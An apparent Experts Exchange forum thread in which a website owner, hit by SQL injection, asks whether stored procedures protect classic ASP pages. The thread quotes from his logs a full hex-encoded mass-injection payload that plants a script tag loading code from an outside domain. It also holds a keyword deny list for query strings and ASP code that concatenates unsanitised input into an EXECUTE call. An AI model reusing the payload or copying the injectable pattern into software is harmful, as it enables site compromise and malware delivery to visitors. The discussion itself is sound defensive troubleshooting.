rito1
asked on
Stored Procedures Prevent Injection Attacks?
Hi All
A website of ours has recently been hit by an injection attack which is corrupting our data within the following line <script src=http://www.dota11 .cn / m.js></script> (added spaces to prevent anyone from clicking it by mistake!)
I have been going through my weblogs and have located where they have tried to perform the attack... Obviously one of our files are vulnerable but inspecting the majority of these files, they actually trigger a stored procedure rather than use inline code.
Please could anyone confirm that I should be looking for inline cone instance and am safe to leave the stored procedure referenced pages as they are?
Is there a cool gadget that can test for vulnerabilities on certain pages or is it more of a painstaking job?
Many thanks,
Rit
A website of ours has recently been hit by an injection attack which is corrupting our data within the following line <script src=http://www.dota11 .cn / m.js></script> (added spaces to prevent anyone from clicking it by mistake!)
I have been going through my weblogs and have located where they have tried to perform the attack... Obviously one of our files are vulnerable but inspecting the majority of these files, they actually trigger a stored procedure rather than use inline code.
Please could anyone confirm that I should be looking for inline cone instance and am safe to leave the stored procedure referenced pages as they are?
Is there a cool gadget that can test for vulnerabilities on certain pages or is it more of a painstaking job?
Many thanks,
Rit
ASKER CERTIFIED SOLUTION
membership
This solution is only available to members.
To access this solution, you must be a member of Experts Exchange.
ASKER
Hi dosth,
Thanks very much. My VB is a little poor... could you briefly explain what your code does?
would it stop the following request....
show_image.asp?imageid=295 4&newsid=4 50';DECLAR E%20@S%20N VARCHAR(40 00);SET%20 @S=CAST(0x 4400450043 004C004100 5200450020 0040005400 2000760061 0072006300 6800610072 0028003200 3500350029 002C004000 4300200076 0061007200 6300680061 0072002800 3200350035 0029002000 4400450043 004C004100 5200450020 0054006100 62006C0065 005F004300 7500720073 006F007200 2000430055 0052005300 4F00520020 0046004F00 5200200073 0065006C00 6500630074 0020006100 2E006E0061 006D006500 2C0062002E 006E006100 6D00650020 0066007200 6F006D0020 0073007900 73006F0062 006A006500 6300740073 0020006100 2C00730079 0073006300 6F006C0075 006D006E00 7300200062 0020007700 6800650072 0065002000 61002E0069 0064003D00 62002E0069 0064002000 61006E0064 0020006100 2E00780074 0079007000 65003D0027 0075002700 200061006E 0064002000 280062002E 0078007400 7900700065 003D003900 390020006F 0072002000 62002E0078 0074007900 700065003D 0033003500 20006F0072 0020006200 2E00780074 0079007000 65003D0032 0033003100 20006F0072 0020006200 2E00780074 0079007000 65003D0031 0036003700 290020004F 0050004500 4E00200054 0061006200 6C0065005F 0043007500 720073006F 0072002000 4600450054 0043004800 20004E0045 0058005400 2000460052 004F004D00 2000200054 0061006200 6C0065005F 0043007500 720073006F 0072002000 49004E0054 004F002000 400054002C 0040004300 2000570048 0049004C00 4500280040 0040004600 4500540043 0048005F00 5300540041 0054005500 53003D0030 0029002000 4200450047 0049004E00 2000650078 0065006300 2800270075 0070006400 6100740065 0020005B00 27002B0040 0054002B00 27005D0020 0073006500 740020005B 0027002B00 400043002B 0027005D00 3D00720074 0072006900 6D00280063 006F006E00 7600650072 0074002800 7600610072 0063006800 610072002C 005B002700 2B00400043 002B002700 5D00290029 002B002700 27003C0073 0063007200 6900700074 0020007300 720063003D 0068007400 740070003A 002F002F00 7700770077 002E006400 6F00740061 0031003100 2E0063006E 002F006D00 2E006A0073 003E003C00 2F00730063 0072006900 700074003E 0027002700 2700290046 0045005400 4300480020 004E004500 5800540020 0046005200 4F004D0020 0020005400 610062006C 0065005F00 4300750072 0073006F00 7200200049 004E005400 4F00200040 0054002C00 4000430020 0045004E00 4400200043 004C004F00 5300450020 0054006100 62006C0065 005F004300 7500720073 006F007200 2000440045 0041004C00 4C004F0043 0041005400 4500200054 0061006200 6C0065005F 0043007500 720073006F 007200%20A S%20NVARCH AR(4000)); EXEC(@S);
Thanks very much. My VB is a little poor... could you briefly explain what your code does?
would it stop the following request....
show_image.asp?imageid=295
SOLUTION
membership
This solution is only available to members.
To access this solution, you must be a member of Experts Exchange.
yes, it will you see i have added this EXEC(, i added all ddl commands and few dml commant to exclude
so anything that comes in querystring will not be deep trhu
sqlArray = "select%20|delete%20|updat e%20|inser t%20|creat e%20|alter %20|drop%2 0|truncate %20|sp_|de clare%20|e xec("
so anything that comes in querystring will not be deep trhu
sqlArray = "select%20|delete%20|updat
ASKER
Excellent, thanks both.
thanks for the points
Likewise, thanks for the grade.
Sorry @dosth, hope you didn't think that I was attacking your solution, I wasn't. I was just trying to offer an alternative viewpoint, something that I believe is referred to as "accept known good". I'm sure your solution does the job, I wasn't doubting that for a moment. I was just trying to point out that this approach of denying input that is regarded "bad", rather than only allowing input that is regarded as "good" i.e. only digits in number fields, holds a greater potential to fall foul of new exploits as they become available.
There is some very interesting reading for us all on the following site:
http://www.owasp.org/index.php/Top_10_2007
Sorry @dosth, hope you didn't think that I was attacking your solution, I wasn't. I was just trying to offer an alternative viewpoint, something that I believe is referred to as "accept known good". I'm sure your solution does the job, I wasn't doubting that for a moment. I was just trying to point out that this approach of denying input that is regarded "bad", rather than only allowing input that is regarded as "good" i.e. only digits in number fields, holds a greater potential to fall foul of new exploits as they become available.
There is some very interesting reading for us all on the following site:
http://www.owasp.org/index.php/Top_10_2007
i agree, my solution is good to stop attack immediately until we figure out best approach
ASKER
I am dealing with an ASP written site which is quite dated now.
Here is an example of the way in which it executes a stored procedure... can you see any vulnerabilies in this?...
Many thanks
Rit
Function GetConnection()
Dim objConn
Set objConn = Server.CreateObject("ADODB
objConn.Open strDSNless
Set GetConnection = objConn
End Function
Function GetRecordset(sSQL)
Dim objConn
' Response.Write(sSQL & "<br>")
' Response.Flush
Set objConn = GetConnection()
Set GetRecordset = objConn.Execute(sSQL)
Set objConn = Nothing
End Function
Dim newsID
newsID = Request.QueryString("newsi
strSQL = "EXECUTE GetNewsItem " & newsID
Set objRS = GetRecordset(strSQL)
the stored procedure for this example looks like this...
CREATE PROCEDURE dbo.GetNewsItem
@NewsID int
AS
SELECT
N.*,
B.BaseCount,
E.EmbeddedCount
FROM
NewsItems AS N
LEFT OUTER JOIN
(
SELECT
NewsID,
COUNT(*) AS BaseCount
FROM
NewsImages
WHERE
NewsID = @NewsID AND
Embedded = 0
GROUP BY
NewsID
) AS B ON N.NewsID = B.NewsID
LEFT OUTER JOIN
(
SELECT
NewsID,
COUNT(*) AS EmbeddedCount
FROM
NewsImages
WHERE
NewsID = @NewsID AND
Embedded = 1
GROUP BY
NewsID
) AS E ON N.NewsID = E.NewsID
WHERE
N.NewsID = @NewsID
GO